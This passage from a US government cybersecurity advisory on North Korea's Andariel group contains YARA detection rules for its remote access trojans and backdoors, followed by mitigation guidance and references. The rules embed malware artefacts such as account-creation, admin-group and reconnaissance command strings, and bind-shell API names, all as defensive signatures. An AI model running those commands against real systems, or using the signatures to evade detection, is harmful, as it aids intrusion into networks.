wide\r\n                             $POST_field_3 = \"id=\" ascii wide\r\n                             $command_misspelled = \"renmae\" ascii wide\r\n              condition:\r\n                             uint16(0) == 0x5a4d and 7 of them\r\nrule Andariel_hhsd_FileTransferTool\r\n{\r\n    strings:\r\n        // 30 4D C7                xor     [rbp+buffer_v41+3], cl\r\n        // 81 7D C4 22 C0 78 00    cmp      dword ptr [rbp+buffer_v41], 78C022h\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 13 of 31\n\n// 44 88 83 00 01 00 00    mov      [rbx+100h], r8b\r\n        $handshake = { 30 ?? ?? 81 7? ?? 22 C0 78 00 4? 88 }\r\n                // B1 14                   mov     cl, 14h\r\n        // C7 45 F7 14 00 41 00    mov      [rbp+57h+Src], 410014h\r\n        // C7 45 FB 7A 00 7F 00    mov      [rbp+57h+var_5C], 7F007Ah\r\n        // C7 45 FF 7B 00 63 00    mov     [rbp+57h+var_58], 63007Bh\r\n        // C7 45 03 7A 00 34 00    mov      [rbp+57h+var_54], 34007Ah\r\n        // C7 45 07 51 00 66 00    mov      [rbp+57h+var_50], 660051h\r\n        // C7 45 0B 66 00 7B 00    mov      [rbp+57h+var_4C], 7B0066h\r\n        // C7 45 0F 66 00 00 00    mov      [rbp+57h+var_48], 66h ; 'f'\r\n        $err_xor_str = { 14 C7 [2] 14 00 41 00 C7 [2] 7A 00 7F 00 C7 [2] 7B 00 63 00 C7 [2] 7A 00 34 00 }\r\n                // 41 02 D0                add     dl, r8b\r\n        // 44 02 DA                add     r11b, dl\r\n        // 3C 1F                   cmp     al, 1Fh\r\n        $buf_add_cmp_1f = { 4? 02 ?? 4? 02 ?? 3? 1F }\r\n        // B9 8D 10 B7 F8          mov     ecx, 0F8B7108Dh\r\n        // E8 F1 BA FF FF          call    sub_140001280\r\n        $hash_call_loadlib = { B? 8D 10 B7 F8 E8 }\r\n        $hash_call_unk = { B? 91 B8 F6 88 E8 }\r\n            condition:\r\n        uint16(0) == 0x5a4d and\r\n        (any of ($handshake, $err_xor_str, $buf_add_cmp_1f) and any of ($hash_call_*)) or\r\n        2 of ($handshake, $err_xor_str, $buf_add_cmp_1f)\r\nrule Andariel_Atharvan_3RAT\r\n{\r\nstrings:\r\n$3RAT = \"D:\\\\rang\\\\TOOL\\\\3RAT\" \r\n$atharvan = \"Atharvan_dll.pdb\"\r\ncondition:\r\nuint16(0) == 0x5a4d and any of them\r\n}\r\nrule Andariel_LilithRAT_Variant\r\n{\r\n    strings:\r\n        // The following are strings seen in the open source version of Lilith\r\n        $lilith_1 = \"Initiate a CMD session first.\" ascii wide\r\n        $lilith_2 = \"CMD is not open\" ascii wide\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 14 of 31\n\n$lilith_3 = \"Couldn't write command\" ascii wide\r\n        $lilith_4 = \"Couldn't write to CMD: CMD not open\" ascii wide\r\n        // The following are strings that appear to be unique to the Unnamed Trojan based on Lilith\r\n        $unique_1 = \"Upload Error!\" ascii wide\r\n        $unique_2 = \"ERROR: Downloading is already running!\" ascii wide\r\n        $unique_3 = \"ERROR: Unable to open file:\" ascii wide\r\n        $unique_4 = \"General error\" ascii wide\r\n        $unique_5 = \"CMD error\" ascii wide\r\n        $unique_6 = \"killing self\" ascii wide\r\n    condition:\r\n        uint16(0) == 0x5a4d and filesize \u003c 150KB and all of ($lilith_*) and 2 of ($unique_*)\r\n}\r\nrule Andariel_SocksTroy_Strings_OpCodes\r\n{\r\n       strings:\r\n        $strHost = \"-host\" wide\r\n        $strAuth = \"-auth\" wide\r\n        $SocksTroy = \"SocksTroy\" \r\n        $cOpCodeCheck = { 81 E? A0 00 00 00 0F 84 ?? ?? ?? ?? 83 E? 03 74 ?? 83 E? 02 74 ?? 83 F? 0B }\r\n    condition:\r\n        uint16(0) == 0x5a4d and\r\n        ((1 of ($str*)) and \r\n        (all of ($c*)) or (all of ($Socks*)))\r\n}\r\nrule Andariel_Agni\r\n{\r\n    strings:\r\n        $xor = { 34 ?? 88 01 48 8D 49 01 0F B6 01 84 C0 75 F1 }\r\n        $stackstrings = {C7 44 24 [5-10] C7 44 24 [5] C7 44 24 [5-10] C7 44 24 [5-10] C7 44 24}\r\n    condition:\r\n        uint16(0) == 0x5a4d and (#xor \u003e 100 and #stackstrings \u003e 5)\r\n}\r\nrule Andariel_GoLang_validalpha_handshake\r\n{\r\n    strings:\r\n        $ = { 66 C7 00 AB CD C6 40 02 EF ?? 03 00 00 00 48 89 C1 ?? 03 00 00 00 }\r\n    condition:\r\n        all of them\r\n}\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 15 of 31\n\nrule Andariel_GoLang_validalpha_tasks\r\n{\r\n    strings:\r\n        $ = \"main.ScreenMonitThread\"\r\n        $ = \"main.CmdShell\"\r\n        $ = \"main.GetAllFoldersAndFiles\"\r\n        $ = \"main.SelfDelete\"\r\n    condition:\r\n        all of them\r\n}\r\nrule Andariel_GoLang_validalpha_BlackString\r\n{\r\n    strings:\r\n    $ = \"I:/01___Tools/02__RAT/Black\"\r\n    condition:\r\n    uint16(0) == 0x5A4D and all of them\r\n}\r\nrule INDICATOR_EXE_Packed_VMProtect {\r\n        strings:\r\n        $s1 = \".vmp0\" fullword ascii\r\n        $s2 = \".vmp1\" fullword ascii\r\n    condition:\r\n        uint16(0) == 0x5a4d and all of them or\r\n        for any i in (0 .. pe.number_of_sections) : (\r\n            (\r\n                pe.sections[i].name == \".vmp0\" or\r\n                pe.sections[i].name == \".vmp1\"\r\n            )\r\n        )\r\n}\r\nrule INDICATOR_EXE_Packed_Themida {\r\n        strings:\r\n        $s1 = \".themida\" fullword ascii\r\n    condition:\r\n        uint16(0) == 0x5a4d and all of them or\r\n        for any i in (0 .. pe.number_of_sections) : (\r\n            (\r\n                pe.sections[i].name == \".themida\"\r\n            )\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 16 of 31\n\n)\r\n}\r\nrule Andariel_elf_backdoor_fipps\r\n{\r\nstrings:\r\n        $a = \"found mac address\"\r\n        $b = \"RecvThread\"\r\n        $c = \"OpenSSL-1.0.0-fipps\"\r\n        $d = \"Disconnected!\"\r\n    condition:\r\n        (all of them) and uint32(0) == 0x464c457f\r\n}\r\nrule Andariel_bindshell\r\n{\r\nstrings:\r\n $str_comspec = \"COMSPEC\"\r\n $str_consolewindow = \"GetConsoleWindow\"\r\n $str_ShowWindow = \"ShowWindow\"\r\n $str_WSASocketA = \"WSASocketA\"\r\n $str_CreateProcessA = \"CreateProcessA\"\r\n $str_port = {B9 4D 05 00 00 89}\r\ncondition:\r\nuint16(0) == 0x5A4D and all of them\r\n}\r\nrule Andariel_grease2\r\n{\r\nstrings:\r\n $str_rdpconf = \"c: \\\\windows\\\\temp\\\\RDPConf.exe\" fullword nocase\r\n $str_rdpwinst = \"c: \\\\windows\\\\temp\\\\RDPWInst.exe\" fullword nocase\r\n $str_net_user = \"net user\"\r\n $str_admins_add = \"net localgroup administrators\"\r\ncondition:\r\nuint16(0) == 0x5A4D and\r\nall of them\r\n}\r\nrule Andariel_NoPineapple_Dtrack_unpacked\r\n{\r\nstrings:\r\n $str_nopineapple = \"\u003c No Pineapple! \u003e\"\r\n $str_qt_library = \"Qt 5.12.10\"\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 17 of 31\n\n$str_xor = {8B 10 83 F6 ?? 83 FA 01 77}\r\ncondition:\r\nuint16(0) == 0x5A4D and\r\nall of them\r\n}\r\nrule Andariel_dtrack_unpacked\r\n{\r\nstrings:\r\n $str_mutex = \"MTX_Global\"\r\n $str_cmd_1 = \"/c net use \\\\\\\\\" wide\r\n $str_cmd_2 = \"/c ping -n 3 127.0.01 \u003e NUL % echo EEE \u003e \\\"%s\\\"\" wide\r\n $str_cmd_3 = \"/c move /y %s \\\\\\\\\" wide\r\n $str_cmd_4 = \"/c systeminfo \u003e \\\"%s\\\" \u0026 tasklist \u003e \\\"%s\\\" \u0026 netstat -naop tcp \u003e \\\"%s\\\"\" wide\r\ncondition:\r\nuint16(0) == 0x5A4D and\r\nall of them\r\n}\r\nrule Andariel_TigerRAT_crowdsourced_rule {\r\n    strings:\r\n        $m1 = \".?AVModuleKeyLogger@@\" fullword ascii\r\n        $m2 = \".?AVModulePortForwarder@@\" fullword ascii\r\n        $m3 = \".?AVModuleScreenCapture@@\" fullword ascii\r\n        $m4 = \".?AVModuleShell@@\" fullword ascii\r\n        $s1 = \"\\\\x9891-009942-xnopcopie.dat\" fullword wide\r\n        $s2 = \"(%02d : %02d-%02d %02d:%02d:%02d)--- %s[Clipboard]\" fullword ascii\r\n        $s3 = \"[%02d : %02d-%02d %02d:%02d:%02d]--- %s[Title]\" fullword ascii\r\n        $s4 = \"del \\\"%s\\\"%s \\\"%s\\\" goto \" ascii\r\n        $s5 = \"[\u003c\u003c]\" fullword ascii\r\n    condition:\r\n        uint16(0) == 0x5a4d and (all of ($s*) or (all of ($m*) and 1 of ($s*)) or (2 of ($m*) and 2 of ($s*)))\r\n}\r\nrule win_tiger_rat_auto {\r\n    strings:\r\n        $sequence_0 = { 33c0 89442438 89442430 448bcf 4533c0 }\r\n            // n = 5, score = 200\r\n            //   33c0                 | jmp                 5\r\n            //   89442438             | dec                 eax\r\n            //   89442430             | mov                 eax, ecx\r\n            //   448bcf               | movzx               eax, byte ptr [eax]\r\n            //   4533c0               | dec                 eax\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 18 of 31\n\n$sequence_1 = { 41b901000000 488bd6 488bcb e8???????? }\r\n            // n = 4, score = 200\r\n            //   41b901000000         | dec                 eax\r\n            //   488bd6                | mov                 eax, dword ptr [ecx]\r\n            //   488bcb               | jmp                 8\r\n            //   e8????????           |                     \r\n        $sequence_2 = { 4881ec90050000 8b01 8985c8040000 8b4104 }\r\n            // n = 4, score = 200\r\n            //   4881ec90050000       | test                eax, eax\r\n            //   8b01                 | jns                 0x16\r\n            //   8985c8040000         | dec                 eax\r\n            //   8b4104               | mov                 eax, dword ptr [ecx]\r\n        $sequence_3 = { 488b01 ff10 488b4f08 4c8d4c2430 }\r\n            // n = 4, score = 200\r\n            //   488b01               | mov                 edx, esi\r\n            //   ff10                 | dec                 eax\r\n            //   488b4f08             | mov                 ecx, ebx\r\n            //   4c8d4c2430           | inc                 ecx\r\n        $sequence_4 = { 488b01 ff10 488b4e18 488b01 }\r\n            // n = 4, score = 200\r\n            //   488b01               | dec                 eax\r\n            //   ff10                 | cmp                 dword ptr [ecx + 0x18], 0x10\r\n            //   488b4e18             | dec                 eax\r\n            //   488b01               | sub                 esp, 0x590\r\n        $sequence_5 = { 4881eca0000000 33c0 488bd9 488d4c2432 }\r\n            // n = 4, score = 200\r\n            //   4881eca0000000       | mov                 eax, dword ptr [ecx]\r\n            //   33c0                 | mov                 dword ptr [ebp + 0x4c8], eax\r\n            //   488bd9               | mov                 eax, dword ptr [ecx + 4]\r\n            //   488d4c2432           | mov                 dword ptr [ebp + 0x4d0], eax\r\n        $sequence_6 = { 488b01 eb03 488bc1 0fb600 }\r\n            // n = 4, score = 200\r\n            //   488b01               | inc                 ecx\r\n            //   eb03                 | mov                 ebx, dword ptr [ebp + ebp]\r\n            //   488bc1               | inc                 ecx\r\n            //   0fb600               | movups              xmmword ptr [edi], xmm0\r\n        $sequence_7 = { 488b01 8b10 895124 448b4124 4585c0 }\r\n            // n = 5, score = 200\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 19 of 31\n\n//   488b01               | sub                 esp, 0x30\r\n            //   8b10                 | dec                 ecx\r\n            //   895124               | mov                 ebx, eax\r\n            //   448b4124             | dec                 eax\r\n            //   4585c0               | mov                 ecx, eax\r\n        $sequence_8 = { 4c8d0d31eb0000 c1e918 c1e808 41bf00000080 }\r\n            // n = 4, score = 100\r\n            //   4c8d0d31eb0000       | jne                 0x1e6\r\n            //   c1e918               | dec                 eax\r\n            //   c1e808               | lea                 ecx, [0xbda0]\r\n            //   41bf00000080         | dec                 esp\r\n        $sequence_9 = { 488bd8 4885c0 752d ff15???????? 83f857 0f85e0010000 488d0da0bd0000 }\r\n            // n = 7, score = 100\r\n            //   488bd8               | dec                 eax\r\n            //   4885c0               | mov                 ebx, eax\r\n            //   752d                 | dec                 eax\r\n            //   ff15????????         |                     \r\n            //   83f857               | test                eax, eax\r\n            //   0f85e0010000         | jne                 0x2f\r\n            //   488d0da0bd0000       | cmp                  eax, 0x57\r\n        $sequence_10 = { 75d4 488d1d7f6c0100 488b4bf8 4885c9 740b }\r\n            // n = 5, score = 100\r\n            //   75d4                 | lea                 ecx, [0xeb31]\r\n            //   488d1d7f6c0100       | shr                 ecx, 0x18\r\n            //   488b4bf8             | shr                 eax, 8\r\n            //   4885c9               | inc                 ecx\r\n            //   740b                 | mov                 edi, 0x80000000\r\n        $sequence_11 = { 0f85d9000000 488d15d0c90000 41b810200100 488bcd e8???????? eb6b b9f4ffffff }\r\n            // n = 7, score = 100\r\n            //   0f85d9000000         | jne                 0xffffffd6\r\n            //   488d15d0c90000       | dec                 eax\r\n            //   41b810200100         | lea                 ebx, [0x16c7f]\r\n            //   488bcd               | dec                 eax\r\n            //   e8????????           |                     \r\n            //   eb6b                 | mov                 ecx, dword ptr [ebx - 8]\r\n            //   b9f4ffffff           | dec                 eax\r\n        $sequence_12 = { 48890d???????? 488905???????? 488d05ae610000 488905???????? 488d05a0550000\r\n488905???????? }\r\n            // n = 6, score = 100\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 20 of 31\n\n//    48890d????????       |                     \r\n            //   488905????????       |                     \r\n            //   488d05ae610000       | test                ecx, ecx\r\n            //   488905????????       |                     \r\n            //   488d05a0550000       | je                  0x10\r\n            //   488905????????       |                     \r\n        $sequence_13 = { 8bcf e8???????? 488b7c2448 85c0 0f8440030000 488d0560250100 }\r\n            // n = 6, score = 100\r\n            //   8bcf                  | mov                 eax, 0x12010\r\n            //   e8????????           |                     \r\n            //   488b7c2448           | dec                 eax\r\n            //   85c0                 | mov                 ecx, ebp\r\n            //   0f8440030000         | jmp                 0x83\r\n            //   488d0560250100       | mov                 ecx, 0xfffffff4\r\n        $sequence_14 = { ff15???????? 8b05???????? 2305???????? ba02000000 33c9 8905????????\r\n8b05???????? }\r\n            // n = 7, score = 100\r\n            //   ff15????????         |                     \r\n            //   8b05????????         |                     \r\n            //   2305????????         |                     \r\n            //   ba02000000           | dec                 eax\r\n            //   33c9                 | lea                 eax, [0x61ae]\r\n            //   8905????????         |                     \r\n            //   8b05????????         |                     \r\n        $sequence_15 = { 4883ec30 498bd8 e8???????? 488bc8 4885c0 }\r\n            // n = 5, score = 100\r\n            //   4883ec30             | jne                 0xdf\r\n            //   498bd8               | dec                 eax\r\n            //   e8????????           |                     \r\n            //   488bc8               | lea                 edx, [0xc9d0]\r\n            //   4885c0               | inc                 ecx\r\n    condition:\r\n        7 of them and filesize \u003c 557056\r\n}\r\nrule win_dtrack_auto {\r\n    strings:\r\n        $sequence_0 = { 52 8b4508 50 e8???????? 83c414 8b4d10 51 }\r\n            // n = 7, score = 400\r\n            //   52                   | push                edx\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 21 of 31\n\n//   8b4508               | mov                 eax, dword ptr [ebp + 8]\r\n            //   50                   | push                eax\r\n            //   e8????????           |                     \r\n            //   83c414               | add                 esp, 0x14\r\n            //   8b4d10               | mov                 ecx, dword ptr [ebp + 0x10]\r\n            //   51                   | push                ecx\r\n        $sequence_1 = { 3a4101 7523 83854cf6ffff02 838550f6ffff02 80bd4af6ffff00 75ae\r\nc78544f6ffff00000000 }\r\n            // n = 7, score = 300\r\n            //   3a4101               | cmp                 al, byte ptr [ecx + 1]\r\n            //    7523                 | jne                 0x25\r\n            //   83854cf6ffff02       | add                 dword ptr [ebp - 0x9b4], 2\r\n            //   838550f6ffff02       | add                 dword ptr [ebp - 0x9b0], 2\r\n            //   80bd4af6ffff00       | cmp                 byte ptr [ebp - 0x9b6], 0\r\n            //   75ae                 | jne                 0xffffffb0\r\n            //   c78544f6ffff00000000     | mov     dword ptr [ebp - 0x9bc], 0\r\n        $sequence_2 = { 50 ff15???????? a3???????? 68???????? e8???????? 83c404 50 }\r\n            // n = 7, score = 300\r\n            //   50                   | push                eax\r\n            //   ff15????????         |                     \r\n            //   a3????????           |                     \r\n            //   68????????           |                     \r\n            //   e8????????           |                     \r\n            //   83c404               | add                 esp, 4\r\n            //   50                   | push                eax\r\n        $sequence_3 = { 8d8dd4faffff 51 e8???????? 83c408 8b15???????? }\r\n            // n = 5, score = 300\r\n            //   8d8dd4faffff         | lea                 ecx, [ebp - 0x52c]\r\n            //   51                   | push                ecx\r\n            //   e8????????           |                     \r\n            //   83c408               | add                 esp, 8\r\n            //   8b15????????         |                     \r\n        $sequence_4 = { 8855f5 6a5c 8b450c 50 e8???????? }\r\n            // n = 5, score = 300\r\n            //   8855f5               | mov                 byte ptr [ebp - 0xb], dl\r\n            //   6a5c                 | push                0x5c\r\n            //   8b450c               | mov                 eax, dword ptr [ebp + 0xc]\r\n            //   50                   | push                eax\r\n            //   e8????????           |                     \r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 22 of 31\n\n$sequence_5 = { 51 e8???????? 83c410 8b558c 52 }\r\n            // n = 5, score = 300\r\n            //   51                   | push                ecx\r\n            //   e8????????           |                     \r\n            //   83c410               | add                 esp, 0x10\r\n            //   8b558c                | mov                 edx, dword ptr [ebp - 0x74]\r\n            //   52                   | push                edx\r\n        $sequence_6 = { 8b4d0c 51 68???????? 8d9560eaffff 52 e8???????? }\r\n            // n = 6, score = 300\r\n            //   8b4d0c               | mov                 ecx, dword ptr [ebp + 0xc]\r\n            //   51                   | push                ecx\r\n            //   68????????           |                     \r\n            //   8d9560eaffff         | lea                 edx, [ebp - 0x15a0]\r\n            //   52                   | push                edx\r\n            //   e8????????           |                     \r\n        $sequence_7 = { 83c001 8945f4 837df420 7d2c 8b4df8 }\r\n            // n = 5, score = 300\r\n            //   83c001               | add                 eax, 1\r\n            //   8945f4               | mov                 dword ptr [ebp - 0xc], eax\r\n            //   837df420             | cmp                 dword ptr [ebp - 0xc], 0x20\r\n            //   7d2c                 | jge                 0x2e\r\n            //   8b4df8               | mov                 ecx, dword ptr [ebp - 8]\r\n        $sequence_8 = { 83c001 89856cf6ffff 8b8d70f6ffff 8a11 }\r\n            // n = 4, score = 300\r\n            //   83c001               | add                 eax, 1\r\n            //   89856cf6ffff         | mov                 dword ptr [ebp - 0x994], eax\r\n            //   8b8d70f6ffff         | mov                 ecx, dword ptr [ebp - 0x990]\r\n            //   8a11                 | mov                 dl, byte ptr [ecx]\r\n        $sequence_9 = { 0355f0 0fb602 0fb64df7 33c1 0fb655fc 33c2 }\r\n            // n = 6, score = 200\r\n            //   0355f0               | add                 edx, dword ptr [ebp - 0x10]\r\n            //   0fb602               | movzx               eax, byte ptr [edx]\r\n            //   0fb64df7             | movzx               ecx, byte ptr [ebp - 9]\r\n            //   33c1                 | xor                 eax, ecx\r\n            //    0fb655fc             | movzx               edx, byte ptr [ebp - 4]\r\n            //   33c2                 | xor                 eax, edx\r\n        $sequence_10 = { d1e9 894df8 8b5518 8955fc c745f000000000 }\r\n            // n = 5, score = 200\r\n            //   d1e9                 | shr                 ecx, 1\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 23 of 31\n\n//   894df8               | mov                 dword ptr [ebp - 8], ecx\r\n            //   8b5518               | mov                 edx, dword ptr [ebp + 0x18]\r\n            //   8955fc               | mov                 dword ptr [ebp - 4], edx\r\n            //   c745f000000000       | mov                 dword ptr [ebp - 0x10], 0\r\n        $sequence_11 = { 8b4df0 3b4d10 0f8d90000000 8b5508 0355f0 0fb602 }\r\n            // n = 6, score = 200\r\n            //   8b4df0               | mov                 ecx, dword ptr [ebp - 0x10]\r\n            //   3b4d10               | cmp                 ecx, dword ptr [ebp + 0x10]\r\n            //   0f8d90000000         | jge                 0x96\r\n            //   8b5508               | mov                 edx, dword ptr [ebp + 8]\r\n            //   0355f0               | add                 edx, dword ptr [ebp - 0x10]\r\n            //   0fb602               | movzx               eax, byte ptr [edx]\r\n        $sequence_12 = { 894d14 8b45f8 c1e018 8b4dfc c1e908 0bc1 }\r\n            // n = 6, score = 200\r\n            //   894d14               | mov                 dword ptr [ebp + 0x14], ecx\r\n            //   8b45f8               | mov                 eax, dword ptr [ebp - 8]\r\n            //   c1e018               | shl                 eax, 0x18\r\n            //   8b4dfc               | mov                 ecx, dword ptr [ebp - 4]\r\n            //   c1e908               | shr                 ecx, 8\r\n            //   0bc1                 | or                  eax, ecx\r\n        $sequence_13 = { 0bc1 894518 8b5514 8955f8 }\r\n            // n = 4, score = 200\r\n            //   0bc1                 | or                  eax, ecx\r\n            //   894518               | mov                 dword ptr [ebp + 0x18], eax\r\n            //   8b5514               | mov                 edx, dword ptr [ebp + 0x14]\r\n            //   8955f8               | mov                 dword ptr [ebp - 8], edx\r\n        $sequence_14 = { 8b5514 8955f8 8b4518 8945fc e9???????? 8be5 }\r\n            // n = 6, score = 200\r\n            //   8b5514               | mov                 edx, dword ptr [ebp + 0x14]\r\n            //   8955f8               | mov                 dword ptr [ebp - 8], edx\r\n            //   8b4518               | mov                 eax, dword ptr [ebp + 0x18]\r\n            //   8945fc               | mov                 dword ptr [ebp - 4], eax\r\n            //   e9????????           |                     \r\n            //   8be5                 | mov                 esp, ebp\r\n    condition:\r\n        7 of them and filesize \u003c 1736704\r\n}\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 24 of 31\n\nMitigation Measures\r\nThe authoring agencies recommend implementing the mitigations below to improve your organization’s\r\ncybersecurity posture based on the threat actors’ activity.\r\nLog4Shell and Other Log4j Vulnerabilities\r\nDefenders should consult the joint Cybersecurity Advisory titled “Mitigating Log4Shell and Other Log4j-Related\r\nVulnerabilities” and CISA’s “Apache Log4j Vulnerability” guidance. Organizations can mitigate the risks posed\r\nby the vulnerability by identifying assets affected by Log4Shell and other Log4j-related vulnerabilities and\r\nupgrading Log4j assets and affected products to the latest version. \r\nNote: CVE-2021-44228 ‘Log4Shell’ was disclosed in December 2021 and affects the Log4j library prior to\r\nversion 2.17.0.\r\nDefenders should remain alert to vendor software updates, and initiate hunt and incident response procedures to\r\ndetect possible Log4Shell exploitation.\r\nWeb Shell Malware\r\nWeb shell malware is deployed by adversaries on a victim’s web server to execute arbitrary system commands.\r\nThe NSA and Australian Signals Directorate’s report titled “Detect and Prevent Web Shell Malware” provides\r\nmitigating actions to identify and recover from web shells.\r\nPreventing exploitation of web-facing servers often depends on maintaining an inventory of systems and\r\napplications, rapidly applying patches as they are released, putting vulnerable or potentially risky systems behind\r\nreverse proxies that require authentication, and deploying and configuring Web Application Firewalls (WAFs).\r\nEndpoint Activity\r\nPreventing and detecting further adversary activity should focus on deploying endpoint agents or other monitoring\r\nmechanisms, blocking unnecessary outbound connections, blocking external access to administrator panels and\r\nservices or turning them off entirely, and segmenting the network to prevent lateral movement from a\r\ncompromised web server to critical assets.\r\nCommand Line Activity and Remote Access\r\nMonitoring for suspicious command-line activity, implementing multi-factor authentication for remote access\r\nservices, and properly segmenting and using allow-listing tools for critical assets can protect against malicious\r\nactivity by RGB 3rd Bureau’s Andariel group and other cyber threat actors.\r\nPacking\r\nSignatures for Themida, VMProtect and a number of other packers are available here , however, the signatures\r\nwill not identify every file packed using these applications.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 25 of 31\n\nAdditional Mitigation Measures for Malicious Activities\r\nCheck for security vulnerabilities, apply patches, and update to the latest version of software\r\nEncrypt all sensitive data including personal information\r\nBlock access to unused ports\r\nChange passwords when they are suspected of being compromised\r\nAlert on unexpected use of dual-use applications\r\nStrengthen the subscriber identity authentication process for leased servers\r\nDPRK Rewards for Justice\r\nThe U.S. and ROK Governments encourage victims to report suspicious activities, including those related to\r\nsuspected DPRK cyber activities, to relevant authorities. If you provide information about illicit DPRK activities\r\nin cyberspace, including past or ongoing operations, you may be eligible for a reward. If you have information\r\nabout illicit DPRK activities in cyberspace, including past or ongoing operations, providing such information\r\nthrough the Department of State’s Rewards for Justice program could make you eligible to receive an award of up\r\nto $10 million. For further details, please visit https://rewardsforjustice.net/ .\r\nAcknowledgements\r\nMandiant and Microsoft Threat Intelligence contributed to this CSA.\r\nDisclaimer of Endorsement\r\nYour organization has no obligation to respond or provide information in response to this product.  If, after\r\nreviewing the information provided, your organization decides to provide information to the authorizing agencies,\r\nit must do so consistent with applicable state and federal law.\r\nThe information in this report is being provided “as is” for informational purposes only. The authoring agencies do\r\nnot endorse any commercial product or service, including any subjects of analysis. Any reference to specific\r\ncommercial products, processes, or service by service mark, trademark, manufacturer, or otherwise, does not\r\nconstitute or imply endorsement, recommendation, or favoring by the co-authors.\r\nVersion History\r\nJuly 25, 2024: Initial version.\r\nAugust 6, 2024: Updated “Credential Access” and “Commodity Malware and Dual-Use Applications” sections.\r\nTrademark Recognition\r\nActive Directory®, Microsoft®, PowerShell®, and Windows® are registered trademarks of Microsoft\r\nCorporation. MITRE® and ATT\u0026CK® are registered trademarks of The MITRE Corporation.\r\nPurpose\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 26 of 31\n\nThis document was developed in furtherance of the authoring agencies’ cybersecurity missions, including their\r\nresponsibilities to identify and disseminate threats, and to develop and issue cybersecurity specifications and\r\nmitigations. This information may be shared broadly to reach all appropriate stakeholders.\r\nContact\r\nU.S. organizations: Urgently report any anomalous activity or incidents, including based upon technical\r\ninformation associated with this Cybersecurity Advisory, to CISA at Contact@mail.cisa.dhs.gov or\r\ncisa.gov/report or to the FBI via your local FBI field office listed at https://www.fbi.gov/contact-us/fieldoffices.\r\nDC3 Cyber Forensics Laboratory (CFL): afosi.dc3.cflintake@us.af.mil\r\nDoD-Defense Industrial Base (DIB) Collaborative Information Sharing Environment\r\n(DCISE): dc3.dcise@us.af.mil\r\nNSA Cybersecurity Report Questions and Feedback: CybersecurityReports@nsa.gov\r\nNSA Defense Industrial Base Inquiries and Cybersecurity Services: DIB_Defense@cyber.nsa.gov\r\nNSA Media Inquiries / Press Desk: 443-634-0721, MediaRelations@nsa.gov\r\nRepublic of Korea organizations: If you suspect cyber incidents involving state actors, including Andariel, or\r\ndiscover similar cases, please contact the relevant authorities below.\r\nNational Intelligence Service: www.nis.go.kr , +82 111\r\nReferences\r\nAhnLab Security Emergency Response Center:\r\nhttps://asec.ahnlab.com/en/56405/\r\nhttps://asec.ahnlab.com/en/59073/\r\nhttps://asec.ahnlab.com/en/66088/\r\nBoredhackerblog: http://www.boredhackerblog.info/2022/11/openssl-100-fipps-linux-backdoor-notes.html\r\nCisco Talos Intelligence blogs:\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nhttps://blog.talosintelligence.com/lazarus-magicrat/\r\nhttps://blog.talosintelligence.com/lazarus-collectionrat/\r\nhttps://blog.talosintelligence.com/lazarus-quiterat/\r\nDCSO blog: https://medium.com/@DCSO_CyTec/andariels-jupiter-malware-and-the-case-of-the-curious-c2-\r\ndbfe29f57499\r\nGithub.com/ditekshen: https://github.com/ditekshen/detection/blob/master/yara/indicator_packed.yar\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 27 of 31\n\nJPCERT blogs:\r\nhttps://blogs.jpcert.or.jp/en/2021/03/Lazarus_malware3.html\r\nhttps://blogs.jpcert.or.jp/en/2022/07/yamabot.html\r\nMandiant blogs:\r\nhttps://www.mandiant.com/resources/blog/north-korea-cyber-structure-alignment-2023\r\nhttps://www.mandiant.com/resources/blog/mapping-dprk-groups-to-government\r\nMicrosoft blogs:\r\nhttps://www.microsoft.com/en-us/security/blog/2023/10/18/multiple-north-korean-threat-actors-exploiting-the-teamcity-cve-2023-42793-vulnerability/\r\nhttps://www.microsoft.com/en-us/security/blog/2022/07/14/north-korean-threat-actor-targets-small-and-midsize-businesses-with-h0lygh0st-ransomware/\r\nNSCS Guidance:\r\nAlert: Apache Log4j Vulnerabilities: https://www.ncsc.gov.uk/news/apache-log4j-vulnerability\r\nInformation: https://www.ncsc.gov.uk/information/log4j-vulnerability-what-everyone-needs-to-know\r\nSymantec blog: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/clasiopa-materials-research\r\nVMware blog: https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html\r\nWithSecure Labs report: https://labs.withsecure.com/publications/no-pineapple-dprk-targeting-of-medical-research-and-technology-sector\r\nAppendix: MITRE ATT\u0026CK Techniques and Software\r\nThe tactics and techniques referenced in this advisory are identified in Table 3 – Table 12.\r\nTable 3. Reconnaissance and Enumeration\r\nTechnique Title ID Use\r\nGather Victim Org\r\nInformation\r\nT1591 The actors gather information about the victim’s organization that can\r\nbe used during targeting.\r\nGather Victim Host\r\nInformation\r\nT1592 The actors gather information about the victim’s hosts that can be used\r\nduring targeting.\r\nActive Scanning\r\nT1595 The actors execute active reconnaissance scans to gather information\r\nthat can be used during targeting.\r\nSearch Open Technical\r\nDatabases\r\nT1596 The actors search freely available technical databases for information\r\nabout victims that can be used during targeting.\r\nhttps://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a\r\nPage 28 of 31\n\nTable 4. Resource Development, Tooling, and Remote Access Tools (RATs)\r\nTechnique Title ID Use\r\nOS Credential\r\nDumping\r\nT1003\r\nThe actors attempt to dump credentials to obtain account login and\r\ncredential material, normally in the form of 